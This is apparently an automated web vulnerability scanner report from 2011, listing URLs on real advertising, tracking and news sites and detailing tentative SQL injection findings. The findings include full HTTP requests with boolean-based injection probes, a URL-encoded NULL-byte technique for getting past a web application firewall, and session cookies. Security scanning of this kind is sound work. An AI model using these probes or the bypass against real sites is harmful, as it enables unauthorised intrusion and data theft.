21.51. http://login.dotomi.com/ucm/UCMController

21.52. http://media2.legacy.com/bind

21.53. http://metrics.citibank.com/b/ss/citinaprod/1/H.22.1/s95367101319134

21.54. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

21.55. http://oc.creditcards.com/trans_node.php

21.56. http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s18412435774225

21.57. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671

21.58. http://online.wsj.com/djscript/latest/dijit/nls/loading.js

21.59. http://p.addthis.com/pixel

21.60. http://p.opt.fimserve.com/bht/

21.61. http://pagead2.googlesyndication.com/pagead/imgad

21.62. http://pbid.pro-market.net/engine

21.63. http://pixel.everesttech.net/1688/i

21.64. http://pixel.invitemedia.com/admeld_sync

21.65. http://pixel.quantserve.com/pixel

21.66. http://puma.vizu.com/cdn/00/00/20/73/smart_tag.js

21.67. http://r.turn.com/r/beacon

21.68. http://rd.rlcdn.com/rd

21.69. http://reviews.homedepot.com/1999q/202642971/reviews.htm

21.70. http://rmd.atdmt.com/tl/DEDENACCEACE/012f5850bb5d4d1c8cbf7566089f1db6/95c1b6c96f2e40f38e53ff93b84b6cd9012f5850bb5d4d1c8cbf7566089f1db6.js

21.71. http://rover.ebay.com/ar/1/76417/4

21.72. http://rt.legolas-media.com/lgrt

21.73. http://script.footprintlive.com/

21.74. http://segment-pixel.invitemedia.com/pixel

21.75. http://services.krxd.net/geoip

21.76. http://soundcloud.com/

21.77. https://soundcloud.com/login

21.78. http://spe.atdmt.com/ds/DEDENACCEACE/Accenture_Image_FY11_Video/us_shark_flash_728x90_8k_v1.gif

21.79. http://spotlight.creditcards.com/www/delivery/ajs.php

21.80. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.81. http://sync.mathtag.com/sync

21.82. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

21.83. http://tf.nexac.com/media/1809966/na.html

21.84. http://va.px.invitemedia.com/pixel

21.85. http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15011168408673

21.86. http://www.bizographics.com/collect/

21.87. http://www.cnbc.com/redirect.aspx

21.88. http://www.creditcards.com/__ssard.png

21.89. http://www.facebook.com/widgets/recommendations.php

21.90. http://www.google-analytics.com/__utm.gif

21.91. http://www.googleadservices.com/pagead/conversion/1049525132/

21.92. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

21.93. http://www.ilslaunch.com/modules/node/node.css

21.94. http://www.inlandbusinesslaw.com/

21.95. http://www.lightsquared.com/

21.96. http://www.res-x.com/ws/r2/Resonance.aspx

21.97. http://www.wunderground.com/dotset.php

22. Cacheable HTTPS response

22.1. https://services.wsj.com/Gryphon/jsp/retentionController.jsp

22.2. https://soundcloud.com/login

22.3. https://www.mavitunasecurity.com/support/checkupdate/

23. HTML does not specify charset

23.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

23.2. http://480-adver-view.c3metrics.com/v.js

23.3. http://a.tribalfusion.com/p.media/a0mNJHpdZao56Zb14cbeTGJaWcJkSAMyWdJUUUn15bEtUEMqVEJ9PavIScZbJRrixPWvcWVbV2UenmtaOXayM2WYCQGFB26JFpWXpVWbb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBlsZb2kS/2020316/frame.html

23.4. http://a.tribalfusion.com/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html

23.5. http://a.tribalfusion.com/p.media/aXmOQK5t6N4mFZdmb3ZaXcfS1VJYXs7OpTrV3rJWTFfBUmnYPTbYQsrnQtBxYdvmWP3N4GQUXUnZbUP6o2PU7Qm7F3t3p1tMAntIM36MY5cbaVcQjWcF7SAFNUHQ3UUr02r2oVaQnWEMlQqQZaSVbIPF6vPWQdWcUR2rXtmHeO0tqIdkZcnjF/2546166/wrapper1.html

23.6. http://a.tribalfusion.com/p.media/aYmNJH2mYHpWAqVdJ6XFfd1bjf1qypPbFFUrZbXTtQXoFBsPFroXqMn5aJl2arPoEbCYrU6WWrRmPvBnVrqotUE3EMi2dmy4mvJprQK0Gn0YcMU1VvMnqj43rZbVWUnEVP32QTQQQG3qQt7O1H7uTmUu2GnX0brZdTPmw2SQS8JJC6j/2522456/frame.html

23.7. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7

23.8. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3

23.9. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4

23.10. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4

23.11. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8

23.12. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

23.13. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword

23.14. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub

23.15. http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow

23.16. http://ads.bridgetrack.com/track/f/

23.17. http://amch.questionmarket.com/adscgen/st.php

23.18. http://api.cnbc.com/api/movers/movers.asp

23.19. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

23.20. http://b3.mookie1.com/2/B3DM/DLX/1@x71

23.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs

23.22. http://cdn.krxd.net/kruxcontent/krux_iframe.html

23.23. http://cdn5.tribalfusion.com/media/1956006/frame.html

23.24. http://cdn5.tribalfusion.com/media/2516896//frm.html

23.25. http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js

23.26. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm

23.27. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm

23.28. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm

23.29. http://ds.addthis.com/red/psi/sites/www.cnbc.com/p.json

23.30. http://fls.doubleclick.net/activityi

23.31. http://m.cnbc.com/mytest/ipecho.php

23.32. http://online.wsj.com/public/resources/live/2_3001_HP_JSON.js

23.33. http://online.wsj.com/static_html_files/WSJThirdParty_Footer_Nav.html

23.34. http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html

23.35. http://optimized-by.rubiconproject.com/a/dk.html

23.36. http://pbid.pro-market.net/engine

23.37. http://platform.twitter.com/widgets/follow_button.html

23.38. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

23.39. https://soundcloud.com/login

23.40. http://switch.atdmt.com/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8

23.41. http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15

23.42. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

23.43. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

23.44. http://tags.bluekai.com/site/2939

23.45. http://tf.nexac.com/media/1809966/na.html

23.46. http://uac.advertising.com/wrapper/aceUACping.htm

23.47. http://view.c3metrics.com/c3VTabstrct-6-2.php

23.48. http://www.inlandbusinesslaw.com/

23.49. http://www.inlandbusinesslaw.com/attorneyprofiles.html

23.50. http://www.inlandbusinesslaw.com/contactus.html

23.51. http://www.inlandbusinesslaw.com/mentoringprogram.html

23.52. http://www.nutter.com/attorneys.php

24. Content type incorrectly stated

24.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

24.2. http://480-adver-view.c3metrics.com/v.js

24.3. http://a1.interclick.com/getInPageJS.aspx

24.4. http://a1.interclick.com/getInPageJSProcess.aspx

24.5. http://adadvisor.net/adscores/g.js

24.6. http://amch.questionmarket.com/adscgen/st.php

24.7. http://bs.serving-sys.com/BurstingPipe/adServer.bs

24.8. http://cdn.slidesharecdn.com/nasbocasestudy110110-101102172823-phpapp02-thumbnail-2

24.9. http://cdn.slidesharecdn.com/thisoldportal2007-100208005551-phpapp02-thumbnail-2

24.10. http://cdn.slidesharecdn.com/yourjourneyyourway-100208010117-phpapp01-thumbnail-2

24.11. http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js

24.12. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm

24.13. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm

24.14. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm

24.15. http://ilslaunch.app2.hubspot.com/salog.js.aspx

24.16. http://m.cnbc.com/mytest/ipecho.php

24.17. http://media.cnbc.com/i/CNBC/Sections/Home/__COVER/__COMPONENTS/MarketOverview/sub_head_bg2.jpg

24.18. http://msnbcmedia.msn.com/i/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PILLS_ALLEN/news_bug_must.jpg

24.19. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

24.20. http://online.wsj.com/public/resources/live/2_3001_HP_JSON.js

24.21. http://rt.legolas-media.com/lgrt

24.22. http://s.wsj.net/public/resources/documents/ac_keyword_exception_list.js

24.23. http://sales.liveperson.net/hcp/html/mTag.js

24.24. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

24.25. http://sr2.liveperson.net/hcp/html/mTag.js

24.26. http://switch.atdmt.com/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8

24.27. http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15

24.28. http://view.c3metrics.com/c3VTabstrct-6-2.php

24.29. http://www.cnbc.com/default.ashx/id/23149822

24.30. http://www.facebook.com/extern/login_status.php

24.31. http://www.homedepot.com/businessControlledFragments/htmls/TypeAhead-min.json

24.32. http://www.homedepot.com/hdus/en_US/DTCCOM/common/commercestatic/hdus/en_US/JavaScripts/baseline.json

24.33. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/arrow_cta.png

24.34. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/clear.png

24.35. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/icon_email.gif

24.36. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/icon_print.gif

24.37. http://www.homedepot.com/wcsstore/hdus/en_US/images/layout/orange-square.png

24.38. http://www.homedepot.com/wcsstore/hdus/en_US/styles/businessjs.json

24.39. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemAddService

24.40. http://www.ilslaunch.com/sites/all/themes/ils/favicon.ico

24.41. http://www.lightsquared.com/wp-content/themes/lightsquared/css/type/titilliumtext22l004-webfont.woff

24.42. https://www.mavitunasecurity.com/support/checkupdate/

24.43. http://www.nutter.com/attorneys.php

24.44. http://www.res-x.com/ws/r2/Resonance.aspx

24.45. http://www2.sesamestats.com/paneltracking.aspx

25. Content type is not specified

25.1. http://ads.bluelithium.com/st

25.2. http://ads.pointroll.com/PortalServe/

25.3. https://soundcloud.com/login

26. SSL certificate

26.1. https://services.wsj.com/

26.2. https://soundcloud.com/

26.3. https://www.mavitunasecurity.com/



1. SQL injection  next
There are 75 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5 [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247910801&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 602
Date: Thu, 16 Jun 2011 18:12:38 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/c/b4/%2a/n;223454979;0-0;0;56063734;4307-300/250;39046206/39063963/3;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=http%3a%2f%2fwww.fool.com/fool/free-report/15/rb-billgates-displayexternal-68077.aspx%3Faid%3D3776%26logvisit%3Dy%26source%3Derbatrbox0860010"><img src="http://s0.2mdn.net/viewad/1452306/1-15_DeathPCVideoOPWSJ_300x250.gif" border=0 alt="Advertisement"></a>');

Request 2

GET /adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.5;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=;ord=7008281818?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308247910801&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 614
Date: Thu, 16 Jun 2011 18:12:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b28/c/b4/%2a/b;223454979;3-0;0;56063734;4307-300/250;42129357/42147144/2;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000924216/cstr=74864635=_4dfa476a,7008281818,768033%5E924216%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=74864635/optn=64?trg=http%3a%2f%2fwww.fool.com/fool/free-report/15/rb-ultimatewireless-displayexternal-107046.aspx%3Faid%3D4062%26logvisit%3Dy%26source%3Derbatrbox0860012"><img src="http://s0.2mdn.net/viewad/1452306/1-15_iPhone5IsCome_BlackHL_300x250.gif" border=0 alt="Advertisement"></a>');

1.2. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s92218100172467 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s92218100172467

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/ccardsccdc-us%00'/1/H.17/s92218100172467?AQB=1&ndh=1&t=17/5/2011%205%3A41%3A25%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%27%26pg%3D1477%26pgpos%3D1&r=http%3A//burp/show/10&cc=USD&xact=1012011061705403763827581&purchaseID=1012011061705403763827581&events=purchase%2Cevent2&products=1477%3B22145581%27%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705403763827581&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%27%7C1&v30=1477%3A22145581%27&v31=22145581%27%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581'&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:58:59 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/ccardsccdc-us was not found on this server.</p>
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/ccardsccdc-us%00''/1/H.17/s92218100172467?AQB=1&ndh=1&t=17/5/2011%205%3A41%3A25%205%20300&ns=creditcardscom&pageName=lead%20confirmation&g=http%3A//www.creditcards.com/oc/%3Fpid%3D22145581%27%26pg%3D1477%26pgpos%3D1&r=http%3A//burp/show/10&cc=USD&xact=1012011061705403763827581&purchaseID=1012011061705403763827581&events=purchase%2Cevent2&products=1477%3B22145581%27%3B1%3B0&c9=5%3A30AM&c10=Friday&c11=Weekday&c12=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v13=1012011061705403763827581&v15=5%3A30AM&c16=1&v16=Friday&v17=Weekday&v18=%5BCS%5Dv1%7C26FD9772051603E8-60000177A00CCF03%5BCE%5D&v25=1477&v26=1&v28=lead%20confirmation&v29=1477%3A22145581%27%7C1&v30=1477%3A22145581%27&v31=22145581%27%7C1&v32=1477%7C1&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/oc/?pid=22145581'&pg=1477&pgpos=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%5D; s_sq=%5B%5BB%5D%5D; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:59:00 GMT
Server: Omniture DC/2.0.0
xserver: www619
Content-Length: 0
Content-Type: text/html


1.3. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s93293816028162 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s93293816028162

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/ccardsccdc-us/1/H.17/s93293816028162?AQB=1&ndh=1&t=17/5/2011%205%3A39%3A33%205%20300&ns=creditcardscom&pageName=home&g=http%3A//www.creditcards.com/&cc=USD&ch=home&v0=999-0-0-0&c1=home&c9=5%3A30AM&c10=Friday&c11=Weekday&v14=999-0-0-0&v15=5%3A30AM&v16=Friday&v17=Weekday&v28=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307173398%27%5D%5D

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:51:39 GMT
Server: Omniture DC/2.0.0
Content-Length: 443
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/ccardsccdc-us/1/H.17/s93293816028162 was not f
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/ccardsccdc-us/1/H.17/s93293816028162?AQB=1&ndh=1&t=17/5/2011%205%3A39%3A33%205%20300&ns=creditcardscom&pageName=home&g=http%3A//www.creditcards.com/&cc=USD&ch=home&v0=999-0-0-0&c1=home&c9=5%3A30AM&c10=Friday&c11=Weekday&v14=999-0-0-0&v15=5%3A30AM&v16=Friday&v17=Weekday&v28=home&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=893&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: cctrkom.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; s_cc=true; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307173398%27%5D%5D

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 17 Jun 2011 10:51:39 GMT
Server: Omniture DC/2.0.0
xserver: www597
Content-Length: 0
Content-Type: text/html


1.4. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s95104773896746 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cctrkom.creditcards.com
Path:   /b/ss/ccardsccdc-us/1/H.17/s95104773896746

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

